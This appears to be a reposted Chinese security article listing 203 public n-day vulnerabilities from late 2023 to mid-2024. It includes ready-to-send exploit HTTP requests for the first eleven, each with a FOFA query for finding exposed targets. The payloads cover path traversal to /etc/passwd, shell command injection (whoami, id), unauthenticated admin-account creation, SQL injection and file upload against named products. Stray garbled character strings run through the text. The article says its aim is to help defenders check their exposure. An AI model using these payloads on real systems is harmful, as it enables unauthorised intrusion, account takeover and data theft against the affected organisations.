互联网公开漏洞整理202309-202406
2 _5 n; X7 I% d; ]道一安全 2024-06-05 07:41 北京. U# l4 s0 m% O
以下文章来源于网络安全新视界 ,作者网络安全新视界: D6 Y$ f: i8 d# w! I) i5 ~2 J
& c. r1 }& Q1 `发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。7 F* t, D& x o, ]5 w. r. X4 J
% k* G8 M) @) o r漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
( q3 x- S6 j# W4 y1 a% T q! X6 u# Z) [% r$ i2 T
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。, F+ _& |/ i* D6 W! ^9 u# e$ i
3 S" V) y: H/ g; u1 m2 \
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。3 i6 S8 C! n; y7 j7 M
8 |! R7 Z2 c; z( h9 }. R合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
0 D* j# B$ O$ j" Q( Y/ u* \: p) P6 {8 o1 s
) a9 I' m7 c( G2 b% d* G% {3 m9 W
声明
" d* k5 n6 X: q) L( X1 o( H. A
+ w0 m. w* v- L7 H为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。' e5 K8 B3 H( K) K( c
# q' Q3 X# k1 g; Y/ r7 z1 _. r
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
* C$ e# x9 u: \, j5 @" R4 @* b
0 b4 K$ a7 s. L* \0 y2 y) T% w
' @" }8 @* Y/ z, X6 R% m- r1 D4 z8 }5 p& ^8 p6 D$ d# Z9 I) z' l
目录& M/ B# q' M4 [1 Z6 K
/ u1 G1 v2 h/ G
01
1 u: \2 F' [* q6 P- C3 \: Z
( q1 w' e& j% |2 l; e9 v* s1. StarRocks MPP数据库未授权访问
9 V7 M9 K: ]. h0 A2. Casdoor系统static任意文件读取
! L7 X$ j m1 z3 }3. EasyCVR智能边缘网关 userlist 信息泄漏
/ \# G. |* F( s* d1 t: J7 Q4. EasyCVR视频管理平台存在任意用户添加
) K& l* M1 e E; |5 V5. NUUO NVR 视频存储管理设备远程命令执行% C) x5 ^5 W4 g
6. 深信服 NGAF 任意文件读取
4 ?- |* H0 I& x- G7 A8 L, l k" F- }6 h7. 鸿运主动安全监控云平台任意文件下载4 t# X! c# ?+ i/ r1 ]: `
8. 斐讯 Phicomm 路由器RCE
0 V! _8 M# c7 a$ \9. 稻壳CMS keyword 未授权SQL注入
0 }. `3 G& M+ ]" n& \' U10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
* U9 W% H+ {4 {9 H- e6 E11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
" j! d+ s: a) [/ [, U, t12. Jorani < 1.0.2 远程命令执行
# T4 D1 ]2 g2 Y& q5 r& R, P$ J13. 红帆iOffice ioFileDown任意文件读取
4 ~/ r( h* g# q& |0 h# V14. 华夏ERP(jshERP)敏感信息泄露; s; D4 G4 n3 D
15. 华夏ERP getAllList信息泄露
/ h- y1 c: W, U16. 红帆HFOffice医微云SQL注入# J& N( p+ }! Y* n8 U
17. 大华 DSS itcBulletin SQL 注入# B7 }+ I, F; K) C
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露5 T1 F x3 G @5 j4 [! j1 l
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
$ q) t/ A7 C- T20. 大华ICC智能物联综合管理平台任意文件读取
5 S I% c, c" l, B' S1 B21. 大华ICC智能物联综合管理平台random远程代码执行
( Z6 R$ u b" s- m8 w22. 大华ICC智能物联综合管理平台 log4j远程代码执行
& Y# i' g9 }( J- Z2 e23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
( y" A& A! ?" a% j6 R8 d/ f: ?24. 用友NC 6.5 accept.jsp任意文件上传' v# D) ]8 Z1 g5 ^! M
25. 用友NC registerServlet JNDI 远程代码执行, n6 ~4 N; |8 ?9 P' ~
26. 用友NC linkVoucher SQL注入" w5 L, E7 ~$ S" P y1 l
27. 用友 NC showcontent SQL注入
+ U2 s4 a: F/ i8 T7 C- K28. 用友NC grouptemplet 任意文件上传
& @! {! g) u' c1 q0 |, g29. 用友NC down/bill SQL注入& O* S9 [! z2 @
30. 用友NC importPml SQL注入
% K: @. i, n7 A1 Y( I* \31. 用友NC runStateServlet SQL注入
* q4 j9 n- d8 b8 H% H" s32. 用友NC complainbilldetail SQL注入. H+ y. H1 i/ ^# N0 ^' z
33. 用友NC downTax/download SQL注入
( A' v$ o9 S' ?. n' s34. 用友NC warningDetailInfo接口SQL注入
) D4 w+ N: s5 ?35. 用友NC-Cloud importhttpscer任意文件上传
" _% y6 |7 V5 f# y( R K- M+ i36. 用友NC-Cloud soapFormat XXE; g- q3 y9 U, }
37. 用友NC-Cloud IUpdateService XXE
: Z$ v# g' J( t' ~1 N4 h) j; q8 q38. 用友U8 Cloud smartweb2.RPC.d XXE) f" ~; {5 }1 r6 ^, v; Q
39. 用友U8 Cloud RegisterServlet SQL注入
7 s, x9 B- A6 S, S& o/ A) F40. 用友U8-Cloud XChangeServlet XXE7 X* H( a1 {$ y! N9 n( O
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
+ V5 N, M( P* E& c! @4 V! v42. 用友GRP-U8 SmartUpload01 文件上传' n2 S7 Y* F0 U9 z. j- @0 W
43. 用友GRP-U8 userInfoWeb SQL注入致RCE- s4 v# K( ^6 @+ j* ~0 r3 L) p
44. 用友GRP-U8 bx_dj_check.jsp SQL注入' A/ j W' T3 z" k/ c
45. 用友GRP-U8 ufgovbank XXE1 r; X. { F; }8 ?& K3 b, x
46. 用友GRP-U8 sqcxIndex.jsp SQL注入: E* U; [3 G7 i6 w$ W
47. 用友GRP A++Cloud 政府财务云 任意文件读取) c7 \6 [+ R1 p# ^. ~) m6 h
48. 用友U8 CRM swfupload 任意文件上传
! O& q! O) |; d+ {( B3 R1 s* W49. 用友U8 CRM系统uploadfile.php接口任意文件上传
# A, L2 J/ N" S. m50. QDocs Smart School 6.4.1 filterRecords SQL注入
3 n6 q/ L- h6 p2 V% s51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入0 Y I9 ^: J: O: G
52. 泛微E-Office json_common.php sql注入
7 v% B( Z7 \" _! Y53. 迪普 DPTech VPN Service 任意文件上传
1 w* Z$ y: t7 c, i2 q6 S54. 畅捷通T+ getstorewarehousebystore 远程代码执行
7 r: p( s- I$ b: h55. 畅捷通T+ getdecallusers信息泄露6 m2 y# m; X3 N7 ]$ M4 K
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE; [7 j: R. S5 }6 K" X. B5 t
57. 畅捷通T+ keyEdit.aspx SQL注入( c: p |$ V k; E
58. 畅捷通T+ KeyInfoList.aspx sql注入
3 e; v% k# @4 q% \" ?2 v- N59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
+ `, j/ x) {# x% I* x) S60. 百卓Smart管理平台 importexport.php SQL注入% c4 r( h6 z# }8 L
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
$ e7 I! x6 w9 ]& n4 F62. IP-guard WebServer 远程命令执行
7 P7 I p% q2 W; N, B63. IP-guard WebServer任意文件读取
& g* m+ L& _* g% F7 B64. 捷诚管理信息系统CWSFinanceCommon SQL注入$ d9 X5 [8 O- s: M! R
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
& V! a$ U9 \+ J9 k1 j- U' C: L/ r66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
G" z A$ O. ~% S" b2 v, j+ b67. 万户ezOFFICE wpsservlet任意文件上传1 F- v! `( R5 g/ u: s9 `4 \+ A/ m
68. 万户ezOFFICE wf_printnum.jsp SQL注入+ _; J8 x5 b7 a: p+ c' l
69. 万户 ezOFFICE contract_gd.jsp SQL注入2 Z3 }7 \8 _* N3 t6 @, R
70. 万户ezEIP success 命令执行3 L: W0 K9 R8 q6 e; z0 b7 ~# I$ H( k
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入+ a% M/ b& a2 |+ \9 Q5 a# v
72. 致远OA getAjaxDataServlet XXE
1 ^2 O3 M2 \2 Z' f73. GeoServer wms远程代码执行, \' T, n% e+ R- z8 h/ W
74. 致远M3-server 6_1sp1 反序列化RCE" V1 F& D$ |: z. u/ e6 R
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
. g. l, K6 d- f1 E3 [+ X; ?' L76. 新开普掌上校园服务管理平台service.action远程命令执行
5 L, Q$ J0 q8 C5 y77. F22服装管理软件系统UploadHandler.ashx任意文件上传
5 q/ w* A4 Y1 u# h8 k! a8 }5 a78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
% t/ S" A: g: D79. BYTEVALUE 百为流控路由器远程命令执行
- M* a5 [( Y) ^2 y4 R) [* D/ I; s80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
' i6 G2 T6 r4 F' K& G! z3 I81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露* C1 O c, O* v+ }* z/ J8 x
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行; B6 }* T) C+ R6 g
83. JeecgBoot testConnection 远程命令执行! q0 l6 h8 a1 j; t- F: P% `
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
" F: K, r) ], n3 f85. SysAid On-premise< 23.3.36远程代码执行
2 c$ y4 G: o; c9 l4 z+ X) |4 X5 E3 M86. 日本tosei自助洗衣机RCE
0 N q4 S! D# W0 l" r, O4 b4 B87. 安恒明御安全网关aaa_local_web_preview文件上传' R" O8 S: ~ h- D4 J# J o: ?; y
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行! k' y$ K; h- M5 D; I
89. 致远互联FE协作办公平台editflow_manager存在sql注入
) v9 U+ K6 F4 C90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
7 F4 `0 s. w* `" c91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
- D1 F. A6 a" k92. 海康威视运行管理中心session命令执行
, L. x- ?6 d$ }) ?93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传( ]/ Y% |4 M; S1 h z$ \
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
4 ^7 ?" ~ c! H K& ~" \: `95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
" p" }5 }7 O. n2 C1 z96. Apache OFBiz 18.12.11 groovy 远程代码执行
2 F1 e0 C5 X$ i. a. o7 D97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
. L4 w G0 ?! T6 q( R98. SpiderFlow爬虫平台远程命令执行
3 g1 t' l6 e! E; `99. Ncast盈可视高清智能录播系统busiFacade RCE
: t' `9 [9 ?( A4 E2 [, ~: G100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
, }1 t* n* Q/ m J* \ h101. ivanti policy secure-22.6命令注入
; o/ n" \4 C2 _0 z102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行 o5 _" @) Y4 c9 N! C7 L- O
103. Ivanti Pulse Connect Secure VPN XXE, ?5 c# `! z9 g' e2 K
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
% J7 B. w2 B/ |105. SpringBlade v3.2.0 export-user SQL 注入
! X" \2 Z1 M7 b G4 B106. SpringBlade dict-biz/list SQL 注入
2 d- T8 W% F) J5 O& v107. SpringBlade tenant/list SQL 注入- O0 }; |$ T' d
108. D-Tale 3.9.0 SSRF$ [7 `$ ~* a; J4 X+ n4 Z
109. Jenkins CLI 任意文件读取
9 _% w6 A# O, m. i* V ?1 K110. Goanywhere MFT 未授权创建管理员
0 C1 F- g3 F+ T* w) l* F$ x6 q111. WordPress Plugin HTML5 Video Player SQL注入- }0 u$ z9 }5 S5 y, s1 Z( m9 t
112. WordPress Plugin NotificationX SQL 注入$ w3 ~+ ?2 `* j9 o5 j6 B
113. WordPress Automatic 插件任意文件下载和SSRF0 P; S s6 V3 b
114. WordPress MasterStudy LMS插件 SQL注入
6 c' ^& D6 m, v q( d7 ]& ?115. WordPress Bricks Builder <= 1.9.6 RCE
( v/ d! b) F8 P( g116. wordpress js-support-ticket文件上传/ w4 [2 v8 O" f7 x+ b( f! {
117. WordPress LayerSlider插件SQL注入/ c2 R6 B* j" \, r% V$ S* l; W+ ?
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
b1 ^& I. |2 i! `119. 北京百绰智能S20后台sysmanageajax.php sql注入
! b# k9 H0 x% U! |% A m120. 北京百绰智能S40管理平台导入web.php任意文件上传' N) Q: R) @+ w7 M
121. 北京百绰智能S42管理平台userattestation.php任意文件上传) |- h8 K3 Z: C, P% S
122. 北京百绰智能s200管理平台/importexport.php sql注入) I% i6 Y4 b8 v0 @9 R/ m+ S
123. Atlassian Confluence 模板注入代码执行
1 r" V: [' p. ]; t0 Z( t& j" F124. 湖南建研工程质量检测系统任意文件上传$ c' ]1 [3 D: R2 r6 r1 S
125. ConnectWise ScreenConnect身份验证绕过2 L# T! b- U, x( M
126. Aiohttp 路径遍历
7 ?, Q. ?9 X( t127. 广联达Linkworks DataExchange.ashx XXE
6 G$ M4 y) \( v128. Adobe ColdFusion 反序列化
! w8 C7 e+ N' q8 T$ p129. Adobe ColdFusion 任意文件读取
M9 ~0 ~6 I, P3 G& f130. Laykefu客服系统任意文件上传- S( X) u0 R8 O5 H: x
131. Mini-Tmall <=20231017 SQL注入
) T8 w* [1 t8 v* ^132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过, p |: ~6 x& P! Y3 q" [3 d
133. H5 云商城 file.php 文件上传8 k, W7 U+ @% C6 s) p( ?" k
134. 网康NS-ASG应用安全网关index.php sql注入4 H3 r2 o2 _. L. n
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
& `! Z, a1 Q% I3 m1 L6 a136. NextChat cors SSRF' w! M$ M7 t. |- B
137. 福建科立迅通信指挥调度平台down_file.php sql注入2 t' v% C. S) K: T/ \
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入# L' ?' a" B% ~$ p+ l
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
& i3 m8 m# ~+ _7 Q" z8 q4 F140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入+ a) n" m" A# H4 } g, X+ P$ f+ `
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入* k: F; |! v) f
142. CMSV6车辆监控平台系统中存在弱密码
7 ~1 H2 w1 {% ? I) O8 J& c8 i* @+ }9 [143. Netis WF2780 v2.1.40144 远程命令执行$ p$ u2 N5 B# _6 N, w
144. D-Link nas_sharing.cgi 命令注入& U/ h1 Z! Z# |7 B7 Z
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入! w- E0 P7 W/ f/ i
146. MajorDoMo thumb.php 未授权远程代码执行
d" C5 b R; K g0 l: \147. RaidenMAILD邮件服务器v.4.9.4-路径遍历8 U7 I9 r* z0 X2 ^
148. CrushFTP 认证绕过模板注入 l4 @. ]$ Y( C- H' N, b& P4 b
149. AJ-Report开源数据大屏存在远程命令执行' Z" K r" E7 p" E9 m& _( u8 k N
150. AJ-Report 1.4.0 认证绕过与远程代码执行" M, x: o* `* ]; H& c" |& ]$ o' T* q. q
151. AJ-Report 1.4.1 pageList sql注入0 e) o& b- K0 e8 T% B* J, [
152. Progress Kemp LoadMaster 远程命令执行
}8 k1 ^; H) P2 Z153. gradio任意文件读取
6 ~' j7 E* Q2 b1 k: S- z154. 天维尔消防救援作战调度平台 SQL注入
' `5 i# D' b+ I155. 六零导航页 file.php 任意文件上传+ |' q/ ~" P) F) \+ b- R" r
156. TBK DVR-4104/DVR-4216 操作系统命令注入2 \2 w; Y! _, |# l$ N: p
157. 美特CRM upload.jsp 任意文件上传
+ [: v O. @: x7 L6 p158. Mura-CMS-processAsyncObject存在SQL注入
a6 S' ^ t$ k m9 P% s159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传9 P0 P4 s- T0 q0 `# i9 l- l
160. Sonatype Nexus Repository 3目录遍历与文件读取) a% }5 X" L! w7 @3 ^7 M$ u$ T
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
& k7 z5 Z, B8 u( e9 c# A; D) W162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传. E, l; O/ Y0 p5 t' q# |+ H: d
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传3 `( W- g: l8 x9 W4 U; S- F
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
* I! s& K3 `3 U$ i5 G c9 L" G165. OrangeHRM 3.3.3 SQL 注入
) a2 ^* i/ ^9 n- ]/ |8 z166. 中成科信票务管理平台SeatMapHandler SQL注入
4 L( \: }: R3 i- Y* Q/ m2 W: ]167. 精益价值管理系统 DownLoad.aspx任意文件读取4 X$ F/ ]" {) o# F+ [
168. 宏景EHR OutputCode 任意文件读取& ^2 a- _& E' d" K% s5 R& S
169. 宏景EHR downlawbase SQL注入4 w9 s8 K; S$ f0 h0 a
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
6 H- m1 Y; j( ~2 z$ ~171. 通天星CMSV6车载定位监控平台 SQL注入
! x& f( M0 {. V* U5 e( `172. DT-高清车牌识别摄像机任意文件读取! y/ D3 `8 L6 c
173. Check Point 安全网关任意文件读取% o( D' M2 F- L! M
174. 金和OA C6 FileDownLoad.aspx 任意文件读取8 A* k& N- a( m, V1 j% L0 I
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
# [0 \* n% S% P! ^, N5 G! x176. 电信网关配置管理系统 rewrite.php 文件上传; H" @( Y3 Q1 d
177. H3C路由器敏感信息泄露
# V9 Z8 N$ J0 Q* Z5 K4 d# p178. H3C校园网自助服务系统-flexfileupload-任意文件上传) l( }* _" w' o
179. 建文工程管理系统存在任意文件读取
% @4 u: w, @2 t) }8 I/ x: H180. 帮管客 CRM jiliyu SQL注入
; @- y0 r* e8 W4 B3 Y( r, a# {( [8 J181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入5 {' D2 a7 E/ G, B9 N3 g1 d
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
) v3 n2 j0 u: Y183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入8 u$ z' }; r) |% V
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
% `6 J+ N" ~$ k0 u$ _) B4 i) P185. 瑞友天翼应用虚拟化系统SQL注入
) g/ m5 N5 \+ ~. \; x186. F-logic DataCube3 SQL注入
$ ^! F D. G- f3 _8 N187. Mura CMS processAsyncObject SQL注入
! F. Z) L3 f5 N+ q. Y& {188. 叁体-佳会视频会议 attachment 任意文件读取" }" s* z6 W3 e5 b
189. 蓝网科技临床浏览系统 deleteStudy SQL注入& {0 r# A& d& _: o1 E- f
190. 短视频矩阵营销系统 poihuoqu 任意文件读取- I' o/ c- u! x: X
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
5 X; C/ f+ t; S, v: V192. 富通天下外贸ERP UploadEmailAttr 任意文件上传3 C D+ e1 T- L% [1 ^! {
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行* k: P: s( a. _
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传5 @0 z6 G' p3 \$ K4 D, O- N$ ]
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行4 J5 f. Y. d! N* x9 h
196. 河南省风速科技统一认证平台密码重置
, w1 n0 n( c/ |- Z, N( }# d# D197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
# l7 ^+ O1 F( e4 V: Q; ~198. 阿里云盘 WebDAV 命令注入5 M+ E+ p( ~! f. I
199. cockpit系统assetsmanager_upload接口 文件上传
* } x. u/ S* K1 b/ f200. SeaCMS海洋影视管理系统dmku SQL注入
. ^ M: T5 ~7 f' t0 x4 s201. 方正全媒体新闻采编系统 binary SQL注入
& n! D( U3 J. b202. 微擎系统 AccountEdit任意文件上传
+ o l' |; q7 `203. 红海云EHR PtFjk 文件上传# R6 j: W% `9 Z* I6 E) D$ x
$ F# ]5 ^2 j ?. {, w7 T2 n
POC列表
$ ] {8 E+ I/ z3 s/ e
5 m' t* Q! z5 C7 y. ?02
5 T$ j7 H+ v) t0 T4 b" G) ?+ H' z x* I7 _8 e/ `
1. StarRocks MPP数据库未授权访问9 k% w* W _+ L
FOFA :title="StarRocks"+ l' k' k0 v; Y1 ^8 ?7 F7 L2 _
GET /mem_tracker HTTP/1.1$ h$ D3 f8 o7 ^
Host: URL
" X: S" a3 H9 i( a1 q+ i0 _) L7 k, ~/ N0 w/ w/ {
1 E7 W/ Q; G: j' ^9 `2. Casdoor系统static任意文件读取2 o+ J* m% `) v6 h3 V
FOFA :title="Casdoor") n! E: V8 N! x7 L7 n
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1$ Y, |% u; H S: m0 Z* e- F1 v
Host: xx.xx.xx.xx:9999
H! E5 c* ^, cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 Y5 |2 O$ [" i3 s0 H
Connection: close
7 R i q, [% s' f2 |Accept: */*/ S& D- _8 J) T$ G. y
Accept-Language: en
; O8 f i$ }4 Z1 L. `Accept-Encoding: gzip, b6 [* Z$ Z4 m% s2 I
& k( V+ a& t/ C/ E" q
. y! z5 x7 n' \: n2 q
3. EasyCVR智能边缘网关 userlist 信息泄漏7 Z y5 x- w- [3 M3 W8 Q6 A
FOFA :title="EasyCVR"
" Y' L3 g4 Y1 uGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
7 B7 ?+ u( {3 C' k0 ]# \Host: xx.xx.xx.xx9 P; a" \+ w8 k' a! R
+ \* d# [- r, z$ ]
. h# b( n; Q' x% ~7 O3 e& p
4. EasyCVR视频管理平台存在任意用户添加5 g2 Z8 j- t) `; q# k% a6 t: A) Q
FOFA :title="EasyCVR"
/ J. |! S, Y- n( W8 t
" j: }; j: q5 h0 G: _9 u$ zpassword更改为自己的密码md5
2 P3 U! h4 z7 ^. S8 m! V6 t" o j: oPOST /api/v1/adduser HTTP/1.1. U- k: }" n2 j/ b: p8 B3 c% M2 V
Host: your-ip" x7 P+ L, H: Q: h8 E
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
" S$ O- P' R9 ~2 A( z
& c4 o1 n$ D' U+ Yname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=19 ` z6 v! P" M# M6 t ~+ a1 ^- s4 n
6 x. i! W. |$ w+ M9 d! E
6 T& a7 A) b- y$ y. z5. NUUO NVR 视频存储管理设备远程命令执行
# n D9 e5 U' K( ]3 qFOFA:title="Network Video Recorder Login"
! _" t% H: }" \4 _, d$ x' ~GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
/ p) b- J! i" n j2 t" wHost: xx.xx.xx.xx
5 S0 ?" \ V" _# a' x+ F# v+ D7 U! y* ^1 g3 ]
4 z' l7 }+ m7 D& c
6. 深信服 NGAF 任意文件读取
6 I: C! }. t1 mFOFA:title="SANGFOR | NGAF"
& K. p' I! |0 c5 V# DGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
' g, b5 T; D. ]+ L6 VHost:. C, F0 W# `0 O4 v/ S! f( w2 G# |/ t
" \: k2 t$ l1 v2 }+ x" c
9 s) \* ~" q5 p0 n# |$ U7. 鸿运主动安全监控云平台任意文件下载* M/ p3 }8 E8 h& ^' z# ]9 G" I* n) J
FOFA:body="./open/webApi.html"
Q6 \" D [6 vGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
# k9 N5 t8 {/ [6 G' a1 qHost:! O" ?! H! ? z# _1 W
7 [. J+ @( s# {7 y0 M* ~9 v% [$ @0 w+ f
8. 斐讯 Phicomm 路由器RCE
7 X E- O. `9 c0 V1 i; @. J$ FFOFA:icon_hash="-1344736688"- I6 S% J3 ]( T2 L
默认账号admin登录后台后,执行操作8 m9 G q9 t; _: c( R% j
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
- Q/ l b* f7 Q7 J* e8 c. UHost: x.x.x.x
6 {6 K' ~ d0 d& G' a4 J( ?Cookie: sysauth=第一步登录获取的cookie
$ { n. W3 c3 l+ u& m8 T8 B2 RContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz3 T0 R) B/ f+ b; G, X+ V
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36+ C7 X/ ~, g7 e
0 _; |! j: Z: l# E: J
------WebKitFormBoundaryxbgjoytz
% }" U) n6 k. `Content-Disposition: form-data; name="wifiRebootEnablestatus"
3 Q* s4 M0 P$ a# y- \3 G8 n9 v
. t! D3 k7 Z( R* _% n%s
' _0 C# X. x% d8 ?' |3 U2 b, F------WebKitFormBoundaryxbgjoytz+ a0 D7 D8 m3 V$ ^9 g
Content-Disposition: form-data; name="wifiRebootrange"8 {* k$ ]3 c9 i- W
9 G6 u5 t0 S' z* \+ k; R( Q12:00; id;
7 c$ u; _& l; \------WebKitFormBoundaryxbgjoytz4 [2 b+ m9 f! \' X8 q( m
Content-Disposition: form-data; name="wifiRebootendrange"0 D* q% f$ u+ ~0 |: X4 N
9 k" W& f& j# T. P%s:
/ w3 }* G C. K------WebKitFormBoundaryxbgjoytz
* P" D0 y' @3 `6 g T; ~" qContent-Disposition: form-data; name="cururl2"
) K5 s9 J. B2 C: M) Q7 K" Q
2 k' r0 z) y( |5 g: d0 A
& y4 F& l: D; W ^+ C/ [2 E------WebKitFormBoundaryxbgjoytz--# H7 ]) T6 x% u
/ P. s- y7 u, V* H: R& m4 A$ \
$ J; b. w$ p. n7 | K: N9. 稻壳CMS keyword 未授权SQL注入
( p7 b0 h' N$ @5 b7 i( |' B: BFOFA:app="Doccms"
" S3 M8 ?1 i1 mGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1+ g0 Z* T! P: [* y% _; a
Host: x.x.x.x; V& v6 d1 U9 Q) f, Q; V& L2 F+ Q, j
) S8 m0 L0 ~9 b/ Z0 M' @
; t' D m! J, K4 t0 v
payload为下列语句的二次Url编码
+ ^( `# Z1 y' W8 s j# l9 D% S; V P* s0 s! N+ ]8 C
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
$ \% o1 e7 ^& t7 G1 ]: u- P/ z" {8 Y' Q6 H! L: Z: k: C
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
w" a( P; ?& _! Y+ i6 XFOFA:icon_hash="953405444", ?7 l4 n! m0 Z% m+ B, Y
0 f6 V: u N @! ?* I9 N( K
文件上传后响应中包含上传文件的路径
- ?) c a4 A' F1 \% f* ]POST /eis/service/api.aspx?action=saveImg HTTP/1.1
- H8 S. I7 y# `$ g/ z9 }Host: x.x.x.x:xx: O$ \' n1 B& X: K# T2 w2 x. q. r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
& x$ Q+ | e. u. E* ^- g1 QContent-Length: 197
& @8 B, D1 f B9 M2 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9. S( f: C W& @& c9 `" I
Accept-Encoding: gzip, deflate
+ m0 M) h; m4 Z* dAccept-Language: zh-CN,zh;q=0.9
& E- | P$ F! R/ o2 ^' E/ GConnection: close8 u8 A% \: B; I- C: r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu* t+ K, B- @1 ]' R% k1 s% Q! _8 k
+ g( {" t' R& \+ W4 Y------WebKitFormBoundaryxdgaqmqu- p/ n/ c! {: g O6 [
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
$ F( N8 J" U* M4 z1 f8 L( n# jContent-Type: text/html, X" Z: C3 L( {
/ | } Y2 T9 n# Z i9 W1 {( ]
jmnqjfdsupxgfidopeixbgsxbf8 d. g. {* w0 g. f" Z( z
------WebKitFormBoundaryxdgaqmqu--8 {7 m, `: h5 k! W3 d! D S
- s$ m& K3 w; a4 Y5 ^% ~' U4 ^/ H; {4 y' C/ d8 ^ g1 |& d
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入( m; r7 T) ?! P+ g, o, c
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
! X- G6 I; s; \( qGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
